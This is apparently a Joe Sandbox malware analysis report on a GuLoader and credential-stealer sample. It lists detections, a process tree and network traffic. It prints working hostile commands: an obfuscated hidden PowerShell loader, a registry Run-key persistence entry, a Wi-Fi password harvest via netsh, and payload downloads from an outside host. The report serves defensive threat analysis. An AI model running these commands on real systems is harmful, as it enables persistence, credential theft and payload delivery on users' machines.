Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1430487
MD5:afaedf2ff4dc43d62b33b003a1a501ab
SHA1:9efe783f2dace329faa38ecefe77b6359dab3bd8
SHA256:1eccc2406bb9358ea0d3290d9b06433732fab544690fbeb65c93a3175ba30422
Infos:

Detection

GuLoader, PXRECVOWEIWOEI Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Capture Wi-Fi password
Yara detected GuLoader
Yara detected PXRECVOWEIWOEI Stealer
Check if machine is in data center or colocation facility
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: ImagingDevices Unusual Parent/Child Processes
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64_ra
  • file.exe (PID: 6928 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AFAEDF2FF4DC43D62B33B003A1A501AB)
    • powershell.exe (PID: 6956 cmdline: "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7152 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • ImagingDevices.exe (PID: 5504 cmdline: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" MD5: 3F6F254D24C457BF33227502ED4F0988)
        • cmd.exe (PID: 4992 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 5824 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • cmd.exe (PID: 6176 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 5888 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
          • netsh.exe (PID: 636 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • findstr.exe (PID: 3388 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
  • svchost.exe (PID: 1696 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • file.exe (PID: 6288 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AFAEDF2FF4DC43D62B33B003A1A501AB)
    • powershell.exe (PID: 6408 cmdline: "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7032 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • ImagingDevices.exe (PID: 5408 cmdline: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" MD5: 3F6F254D24C457BF33227502ED4F0988)
  • msiexec.exe (PID: 2212 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.2217463796.000000002526E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PXRECVOWEIWOEIYara detected PXRECVOWEIWOEI StealerJoe Security
    00000012.00000002.2217463796.0000000025265000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PXRECVOWEIWOEIYara detected PXRECVOWEIWOEI StealerJoe Security
      0000000F.00000002.2205196768.000000000F541000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000012.00000002.2217463796.0000000024FBA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000001.00000002.1641973533.000000000E71D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: ImagingDevices Unusual Parent/Child Processes
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe", ParentImage: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe, ParentProcessId: 5504, ParentProcessName: ImagingDevices.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", ProcessId: 4992, ProcessName: cmd.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5824, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Udbygningerne230
            Sigma detected: Direct Autorun Keys Modification
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4992, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", ProcessId: 5824, ProcessName: reg.exe
            Sigma detected: Potential Dosfuscation Activity
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6956, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 7152, ProcessName: cmd.exe
            Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe", ParentImage: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe, ParentProcessId: 5504, ParentProcessName: ImagingDevices.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", ProcessId: 4992, ProcessName: cmd.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)", CommandLine: "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6928, ParentProcessName: file.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)", ProcessId: 6956, ProcessName: powershell.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1696, ProcessName: svchost.exe

            Stealing of Sensitive Information

            barindex
            Sigma detected: Capture Wi-Fi password
            Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe", ParentImage: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe, ParentProcessId: 5504, ParentProcessName: ImagingDevices.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 6176, ProcessName: cmd.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49705 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49709 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49711 version: TLS 1.2
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Pitapats\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Curan158\
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: unknownDNS query: name: whatismyipaddressnow.co
            Source: unknownDNS query: name: whatismyipaddressnow.co
            Source: unknownDNS query: name: icanhazip.com
            Source: unknownDNS query: name: icanhazip.com
            Source: unknownDNS query: name: ip-api.com
            Source: global trafficHTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
            Source: unknownHTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49705 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49709 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: crowninter.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownHTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49711 version: TLS 1.2
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWindow created: window name: CLIPBRDWNDCLASS
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@54/21@5/39
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Pitapats
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMutant created: \Sessions\1\BaseNamedObjects\651689
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_03
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsvF7C9.tmp
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exe
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
